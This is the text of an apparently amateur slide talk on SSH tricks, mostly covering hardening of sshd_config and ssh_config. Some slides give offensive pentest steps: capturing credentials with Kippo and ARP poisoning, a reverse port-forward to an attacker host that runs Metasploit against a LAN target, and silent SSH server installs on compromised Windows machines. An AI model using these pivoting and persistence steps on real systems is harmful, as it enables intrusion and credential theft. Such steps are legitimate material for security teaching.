2. Who am I?
• Just another computer technician
• Obtaining my macro degree in network
administration from GRCC
• Planning on getting a Bachelors degree in Digital
Forensics at FSU
• Been tinkering with computers since I was in middle
school
• Became obsessed with Information Security in 2005
• Owner/Hoster of zitstif.no-ip.org
• Administrator on HITB forums
3. Read this book if you want to learn
more about SSH!
SSH, The Secure Shell: The Definitive
Guide, 2nd Edition
By Daniel J. Barrett, Richard E. Silverman
,Robert G. Byrnes
Publisher: O'Reilly Media
Released: May 2005
Pages: 668
5. Why do a presentation on SSH tricks?
• SSH is one of my favorite protocols
• There have been plenty of articles and blog
posts on the subject – I thought it was time to
kind of aggregate these and add some of my
own tips/tricks
6. What is SSH?
• Is it a shell? … No
• Is it a solution to all of your security
problems? … No
“Secure Shell or SSH is a network protocol that
allows data to be exchanged using a secure
channel between two networked devices.” -
en.wikipedia.org/wiki/SSh
7. SSH History
• SSH v1.X - Invented by Tatu Ylönen in 1995
• Created due to a password sniffing attack that
took place at Helsinki University of Technology
• Created as a secure replacement for telnet,
rlogin and rsh protocols
8. SSH and You!
• If you work in the information technology
realm, there’s a good chance you have used SSH
before.
• The SSH Client is natively available on
practically all Non-Windows Operating Systems
• Can be more quick and dirty than Remote
Desktop
• Easier to use on a phone than Remote Desktop
(You may want to check out ‘mosh’
http://mosh.mit.edu/ )
9. What can I use SSH for?
• For login to a shell on a remote host
• For executing a single command on a remote
host (replacing rsh)
• Secure file transfer
• For forwarding or Tunneling
• Forwarding X from remote hosts
• The list goes on...
https://en.wikipedia.org/wiki/Secure_Shell#Usag
e
10. SSH and Cyber Espionage
• Duqu Worm – (Nov 2011) Contained
instructions to exploit a zero day vulnerability
in OpenSSH 4.3 on CentOS systems
– After compromising the system the worm then
updated OpenSSH to version 5.8
11. Speaking of SCADA/SSH...
“Another day, another SCADA threat: ICS-CERT is
now warning utilities and other critical
infrastructure providers about potential brute-
force attacks against control systems with SSH
command-line access. “
- Kelly Jackson Higgins (darkreading.com)
Feb 06, 2012
13. Insecurity Issues With Default
Client Settings
Make sure your clients (and servers) are strictly using version 2
Or they may be vulnerable to version downgrade attacks!
You can also edit your ssh_config and change
the directive :
Protocol 2
14. Downgrade attacks on SSH Clients
Downgrade attacks can
be performed with ettercap-ng
and ettercap-filters!
Image From http://openmaniak.com/
15. Connecting for the first time to an
SSH Server: Do you know it’s safe?
If you’re very paranoid, you’ll want to verify the RSA fingerprint and randomart image
with what fingerprint your given when connecting.
To do so: On the server side you’ll have (usually requiring physical access to the
Machine) You would need to do this:
sudo ssh-keygen -lvf /etc/ssh/ssh_host_rsa_key.pub
Then on your client side you want to edit your ssh_config file and set this option:
VisualHostKey yes
http://www.itworld.com/it-managementstrateg
16. Connecting for the first time to an
SSH Server: Do you know it’s safe?
One issue with this: “Obviously you need a
secure method of getting verified copies of
the fingerprint and randomart images for the
computers you want to log into. ” - Carla
Schroder
http://www.itworld.com/it-managementstrategy/261500/16
17. One other thing.. Oh yeah Kippo can be ugly..
An attacker can capture your SSHv2 credentials using Kippo:
•To do so an attacker needs to be in your local area network or spoofing the IP address
or domain name of the SSH server host that the victim is trying to connect to.
•Setup Kippo to listen on the appropriate port
•If needed perform an ARP poisoning attack on the victim.
•Once the victim tries to connect they would most likely
get a mismatching fingerprint. However, with putty, an
ignorant or hasty victim could simply click “YES”.
http://pauldotcom.com/wiki/index.php/Episod
18. OK I’m connected…am I still safe?
Not necessarily
- Some versions of the openssh-
server daemon will handle
password authentication in clear
text in memory!
Proof of concept:
http://zitstif.no-ip.org/capturessh2.txt
#Tested on SSH-2.0-OpenSSH_4.7p1
Debian-8ubuntu1.2
#Tested on SSH-2.0-OpenSSH_5.1p1
Debian-5ubuntu1
#Tested on OpenSSH 5.2 (protocol 2.0)
Fedora 11
Need to find the source on this
one!
19. OK I’m connected…am I still safe?
Watch out on your client side: http://blog.diogomonica.com/post/3087360614
Poor man’s SSH keylogger!
20. Locking Down The Server Side:
sshd_config is your friend!
•This may be debatable, but change
your ssh server’s listening port to
something different than port 22.
• Again.. Make sure your ssh server is
strictly using Protocol Version 2
•Do not permit root login!
•Permit/Deny only specific users or
groups! (AllowUsers/AllowGroups
Directive OR DenyUsers/DenyGroups)
https://www.linux.com/learn/tutorials/305769-a
21. Oh yeah..a quick note on changing the
default port for ssh
http://danielmiessler.com/blog/security-and-ob
23. Locking Down The Server Side:
sshd_config is your friend!
•Disable PasswordAuthentication and
authenticate only using keys
•Configure an Idle Log out time period
(ClientAliveInterval XXX )
•Limit what interface/addresses SSHD
binds to
•Limit the amount of authentication tries
(MaxAuthTries ) https://www.linux.com/learn/tutorials/305769
http://www.cyberciti.biz/tips/linux-unix-bsd-op
24. Locking Down The Server Side:
sshd_config is your friend!
•Change the login grace time
(LoginGraceTime)
•Oh yeah… disable empty passwords
(Duh..) (PermitEmptyPasswords no)
https://www.linux.com/learn/tutorials/305769
http://www.cyberciti.biz/tips/linux-unix-bsd-op
http://www.uptimemore.com/password-retry-
25. Locking Down The Server Side:
Programs to help you lock down your server
•If applicable use iptables (or pf)
to permit/deny specific IP
addresses/ranges
List of programs to help ward off
dictionary attacks/brute force
attacks on
http://www.cyberciti.biz/tips/linux-unix-bsd-openssh-server-best-p
(#16)
•Setup port-knocking!
http://www.cyberciti.biz/tips/linux-unix-bsd-op
26. Quick tips for speeding up SSHD login
sshd_config is your friend!
•Disable server side DNS look-
ups if you don’t need it.
(UseDNS No)
If you’re not using PAM with
SSH then disable PAM
(UsePAM No)
http://www.cyberciti.biz/tips/linux-unix-bsd-op
27. Client side configuration tips
ssh_config is your friend!
Are you sick of constantly typing in your
passwords (if you’re using passwords) when
doing additional connections when you’ve
already authenticated to your ssh server?
Solution: Add this to your ssh_config file
Host *
ControlPath ~/.ssh/master-%r@%h:%p
ControlMaster auto
http://www.evilsoft.org/2009/10/23/stupid-
28. Client side configuration tips
ssh_config is your friend!
Save yourself some keystrokes!
ssh –C –D 1234 user@example.com -p 5432
Edit your ssh_config file to something like this:
Host example example.com
HostName example.com
User user
Port 5432
DynamicForward 1234
Compression Yes
Now you only need to type:
ssh example
http://codeutopia.net/blog/2011/07/08/why-di
29. Client side configuration tips
ssh_config is your friend!
Are there any options to check for DNS
spoofing?
YES!
CheckHostIP Yes
This will force ssh to do an additional check
in the known_hosts file for the IP address of
the server.
30. For more information on configuring sshd_config
and ssh_config, please see:
man sshd_config && man ssh_config
31. Now for those beautiful client-sided one
liners…(top 10 one liners from commandlinefu.com)
1
2
3
4
5
39. Client-sided one liners: Fun with the ‘-t’
option
Any programs that need a pseudo terminal screen to work and you need run quickly, use
-t.
Examples:
ssh –t user@example.com “python”
ssh –t user@example.com “irb”
ssh –t user@example.com “ssh anotheruser@anotherhost.com”
ssh –t user@example.com “msfconsole”
ssh –t user@example.com “screen”
ssh -t user@example.com “vi”
40. Client-sided one liners: Fun with reverse
connections
Don’t have metasploit or any fancy info-sec security tools on your device that is connected
to a LAN, but this device still has an SSH client on it?
NO PROBLEM!
Target host: 192.168.1.102
Target port: 445
Payload port: 4444
ssh –t –R 192.168.1.102:445:127.0.0.1:4445 –R 192.168.1.102:4444:127.0.0.1:4444
attacker@penbox.org “msfconsole”
Then through metasploit on your remote host you would point your attacks towards your
loopback interface
41. Client-sided one liners (Poor man’s VPN/proxy)
This will bind a SOCKS server to port 9050 on the interface 192.168.1.100
42. Client-sided one liners (Poor man’s VPN/proxy)
OK big deal.. I know that.. What’s special about it?
43. Client-sided one liners (Poor man’s VPN/proxy)
What this means:
•You can now tunnel traffic securely between you the client, and example.com
• If example.com’s subnet is 10.1.10.255, you can now access resources in that
subnet via your tunnel, hence why this is a poorman’s VPN.
•You can use programs like proxychains in tandem with SOCKS
•NOTE: example.com’s hosts file (/etc/hosts) does affect the DNS name resolution of
the SOCKS client
44. Client-sided one liners (Poor man’s VPN/proxy)
Programs that play nicely with proxychains:
rdesktop
netcat
socat
nmap
hping
telnet
openvas
nessus
hydra
wget
ssh
metasploit (though not needed) (set Proxies socks5:localhost:1234)
ncrack
...(The list goes on)
Almost any application that works on *nix and relies on TCP/IP
45. Ways of setting up sshd the quick and
dirty way…
Scenario 1:
Are you doing a pentest and you’re able to find a router that is compatible with openwrt or
dd-wrt?
Upload it! Most versions of openwrt and dd-wrt support SSHD
Scenario 2:
You’ve popped a shell on a Windows box and you’d like to setup an SSHD server:
Copssh_3.1.4_Installer.exe /S
Copssadm --command activeuser –user USERNAME –shell /bin/bash
46. Ways of setting up sshd the quick and
dirty way…
Meterpreter from the metasploit project now has a meterpreter script that can deploy an
openssh server on Windows victims. (I must admit, the few times I’ve tried it, it has never
worked for me!)